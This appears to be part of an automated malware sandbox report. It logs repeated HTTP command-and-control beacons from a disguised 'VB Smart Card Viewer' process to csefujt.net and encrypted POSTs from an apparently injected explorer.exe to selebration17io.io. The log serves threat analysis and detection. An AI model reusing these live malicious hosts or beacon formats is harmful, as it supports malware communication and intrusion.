                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:38.743875980 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:38.980588913 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:38 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                118192.168.2.649860185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:39.325793982 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:39.567667007 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:39 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                119192.168.2.649861185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:39.906076908 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:40.148735046 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:40 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                120192.168.2.64986291.215.85.120804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:40.353662014 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://qpvffufpuvb.org/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:40.353707075 CET196OUTData Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 8f a5 23 de
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO#ft:=ieoaFO0.~0!cw))JnDDLW(bygW53z_/#
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:40.606726885 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:40 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                121192.168.2.649863185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:40.502882004 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:40.739677906 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:40 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                122192.168.2.649864185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:41.071656942 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:41.315661907 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:41 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                123192.168.2.649865185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:41.656429052 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:41.893106937 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:41 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                124192.168.2.649866185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:42.242583036 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:42.485846043 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:42 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                125192.168.2.649867185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:42.830730915 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:43.067274094 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:42 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                126192.168.2.649868185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:43.442486048 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:43.683675051 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:43 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                127192.168.2.649870185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:44.063411951 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:44.305496931 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:44 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                128192.168.2.64987191.215.85.120804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:44.466073990 CET286OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://porpskhbqsfeiw.org/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 157
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:44.466135979 CET157OUTData Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 a8 f2 05 bc
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO-uG$`WXkMhVj)5e8[zI
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:44.718945980 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:44 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                129192.168.2.649872185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:44.991101027 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:45.235088110 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:45 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                130192.168.2.649874185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:45.624133110 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:45.860800982 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:45 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                131192.168.2.649875185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:46.219244003 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:46.463973045 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:46 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                132192.168.2.649877185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:46.812902927 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:47.049515963 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:46 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                133192.168.2.649878185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:47.400944948 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
